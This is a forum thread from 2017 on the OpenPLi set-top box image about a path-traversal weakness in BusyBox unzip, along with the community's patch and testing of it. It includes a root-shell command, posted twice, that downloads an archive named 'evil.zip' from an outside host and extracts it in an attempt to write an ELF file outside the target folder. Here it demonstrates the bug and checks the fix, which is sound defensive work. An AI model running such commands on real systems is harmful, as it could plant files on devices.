satdreamgr-openpli 5 osmega osmega login: root Password: root@osmega:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1; Connecting to iptvplayer.pl (87.98.239.40:80) evil.zip 100% |***********| 150 0:00:00 ETA Archive: /tmp/tmp1/tmp2/evil.zip unzip: removing leading '../../' from member names inflating: make_some_bad.elf ls: /tmp/make_some_bad.elf: No such file or directory root@osmega:/var/volatile/tmp#
Very important - security issue
Re: Very important - security issue #21
Posted 28 May 2017 - 19:32
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916
Re: Very important - security issue #22
Posted 28 May 2017 - 19:46
I can confirm that.
Question is if it's worthwhile spending time on an image to be retired soon, and if so, who's going to do it?
Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)
Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.
Many answers to your question can be found in our new and improved wiki.
Re: Very important - security issue #23
Posted 28 May 2017 - 20:53
Adding function strip_unsafe_prefix(_unzip) in unzip.c should be enough.
Will check it, if nobody else comes with a fix the next days.
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916
Re: Very important - security issue #24
Posted 28 May 2017 - 22:00
Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?
Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)
Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.
Many answers to your question can be found in our new and improved wiki.
Re: Very important - security issue #25
Re: Very important - security issue #26
Posted 29 May 2017 - 15:44
Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?
Tested and works!
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tm p/tmp1; Connecting to iptvplayer.pl (87.98.239.40:80) evil.zip 100% |***********************************************************************************************************************************************************| 150 0:00:00 ETA Archive: /tmp/tmp1/tmp2/evil.zip unzip: removing leading '../../' from member names inflating: make_some_bad.elf ls: /tmp/make_some_bad.elf: No such file or directoryHere is the PR: https://github.com/O...e-core/pull/242
Thanks @samsamsam
Edited by athoik, 29 May 2017 - 15:44.
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916
Re: Very important - security issue #27
Posted 29 May 2017 - 18:24
Security implications should be next to nothing anyway, any sane plugin that processes compressed files should use Python's built-in modules. The scenario as described in the article would never apply to OpenPLi anyway.
Re: Very important - security issue #28
Posted 29 May 2017 - 18:45
@MiLo
should use Python's built-in modules
Really? You are sure that "Python's built-in modules" are not vulnerable on this?
Second thing you suggest that it is better to block main GUI thread when extracting archive then use eConsole component?
I have no more questions...
Edited by samsamsam, 29 May 2017 - 18:45.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users